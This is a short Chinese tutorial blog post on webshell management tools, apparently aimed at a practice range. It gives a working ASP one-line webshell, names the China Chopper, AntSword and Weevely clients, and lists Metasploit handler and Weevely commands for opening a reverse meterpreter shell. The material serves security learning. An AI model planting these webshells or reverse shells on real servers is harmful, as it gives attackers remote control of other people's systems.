【入侵工具】webshell管理工具基础使用

| | | | 226

测试靶场

环境:http://59.63.200.79:8804/

木马

  • 小马:上传文件,体积较小,文件管理(例如sqlmap的管理os-shell里面就会帮你上传小马)

  • 大马: 文件体积较大、功能齐全、能够提权、操作数据库等

  • 一句话木马(主流):功能强大、客户端直接管理 

    1
    2
    3
    例如:
    asp的一句话木马:<% execute request['a']%>
    php的一句话木马:

中国菜刀

image-20210616132010184

image-20210616132124651

image-20210616132150963

image-20210616132342456

中国蚁剑

Kali Linux shell Weevely

安装:https://github.com/epinna/weevely3 (一般kali linux都自带了)

生成meterpreter会话

  • MSF设置

    • use exploit/multi/handler
    • show payloads
    • set payload php/meterpreter/reverse_tcp
    • show options
    • set lhost 本机IP
    • run

  • 2、生成meterpreter会话

    1
    backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 本机ip -port 端口

本文标题:【入侵工具】webshell管理工具基础使用

文章作者:孤桜懶契

发布时间:2021年06月16日 - 12:54:38

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/27.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️